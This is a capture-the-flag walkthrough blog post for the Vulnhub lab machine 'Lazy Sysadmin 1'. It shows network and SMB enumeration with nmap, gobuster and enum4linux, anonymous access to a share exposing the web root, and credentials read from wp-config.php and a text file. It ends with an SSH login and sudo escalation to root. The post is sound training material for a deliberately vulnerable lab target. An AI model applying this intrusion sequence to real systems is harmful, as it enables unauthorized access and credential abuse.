Lazy Sysadmin 1 – Vulnhub

One of the boxes that started me on my journey into CTF’s. Strictly a beginners box, this one can be done without an intermediate techniques, such as reverse shells. The box can be found on Vulnhub. Let’s get started.

Enumeration

nmap -n -sC -sV -p- -oA initial-nmap 192.168.56.101 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 20:19 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00012s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info: 
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.56.102
|_ error: Closing link: ([email protected]) [Client exited]
MAC Address: 08:00:27:0D:C3:62 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</pre>
Host script results:
|_clock-skew: mean: -1h20m00s, deviation: 5h46m24s, median: 1h59m58s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2018-06-28T06:19:52+10:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018-06-27 22:19:52
|_ start_date: N/A

That’s a lot of sevices. To sum it up:

  • 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  • 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
  • 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu
  • 3306/tcp open mysql MySQL (unauthorized)
  • 6667/tcp open irc InspIRCd
gobuster -u 192.168.56.101 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x .html,.pdf,.txt,.cgi,.php

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.56.101/
[+] Threads : 100
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
[+] Extensions : .html,.pdf,.txt,.cgi,.php
=====================================================
/index.html (Status: 200)
/info.php (Status: 200)
/wordpress (Status: 301)
/test (Status: 301)
/wp (Status: 301)
/apache (Status: 301)
/old (Status: 301)
/javascript (Status: 301)
/robots.txt (Status: 200)
/phpmyadmin (Status: 301)

==================================================

Visiting the /wordpress url delivers the username “My name is togie”

Lets run enum4linux to get some info on the box.

enum4linux 192.168.56.101
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 27 21:02:37 2018

==========================
| Target Information |
==========================
Target ........... 192.168.56.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

======================================================
| Enumerating Workgroup/Domain on 192.168.56.101 |
======================================================
[+] Got domain/workgroup name: WORKGROUP

==============================================
| Nbtstat Information for 192.168.56.101 |
==============================================
Looking up status of 192.168.56.101
LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=======================================
| Session Check on 192.168.56.101 |
=======================================
[+] Server 192.168.56.101 allows sessions using username '', password ''

=============================================
| Getting domain SID for 192.168.56.101 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

========================================
| OS information on 192.168.56.101 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.56.101 from smbclient:
[+] Got OS info for 192.168.56.101 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03

===============================
| Users on 192.168.56.101 |
===============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

===========================================
| Share Enumeration on 192.168.56.101 |
===========================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 192.168.56.101
//192.168.56.101/print$ Mapping: DENIED, Listing: N/A
//192.168.56.101/share$ Mapping: OK, Listing: OK
//192.168.56.101/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

======================================================
| Password Policy Information for 192.168.56.101 |
======================================================

[+] Attaching to 192.168.56.101 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

================================
| Groups on 192.168.56.101 |
================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

=========================================================================
| Users on 192.168.56.101 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

We see here that there is a local user called ‘togie’ (as noted on /wordpress) and that there is an SMB share that is accessible without a password. Let’s see if we can exploit this.

Exploitation

We can use smbclient to access this share. When it asks for a password, just press Enter.

smbclient //192.168.56.101/share$
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 13:05:52 2017
.. D 0 Mon Aug 14 14:34:47 2017
wordpress D 0 Tue Aug 15 13:21:08 2017
Backnode_files D 0 Mon Aug 14 14:08:26 2017
wp D 0 Tue Aug 15 12:51:23 2017
deets.txt N 139 Mon Aug 14 14:20:05 2017
robots.txt N 92 Mon Aug 14 14:36:14 2017
todolist.txt N 79 Mon Aug 14 14:39:56 2017
apache D 0 Mon Aug 14 14:35:19 2017
index.html N 36072 Sun Aug 6 07:02:15 2017
info.php N 20 Tue Aug 15 12:55:19 2017
test D 0 Mon Aug 14 14:35:10 2017
old D 0 Mon Aug 14 14:35:13 2017

Sweet! We have access to the web-root. Lets use the ‘get’ command to download deets.txt, todolist.txt and the wp-config.php from the /wordpress site. I normally always get the wp-config.php, since it often contains the MySQL password:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

I tried the password on the /phpmyadmin page, but it seems like a rabbit hole. Lets view the .txt files we pulled earlier. Todolist.txt says:

 Prevent users from being able to view to web root using the local file browser

Deets.txt says:

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Damn, what a lazy admin indeed. So now we have a username (togie) and a password (12345).  Lets see if this allows us to login on the SSH-service:

ssh 192.168.56.101 -l togie
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################

[email protected]'s password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information disabled due to load higher than 1.0

133 packages can be updated.
0 updates are security updates.

[email protected]:~$
(ALL : ALL) ALL 

Privilege Escalation

Lets see what sudo allows us to do:

sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:

(ALL : ALL) ALL

Well. that looks like game, set and match:

[email protected]:~$ sudo su
[email protected]:/home/togie# cd /root/
[email protected]:~# ls
proof.txt 

Really enjoyed this box. Quite easy and really helpful in learning the initial skills for CTF!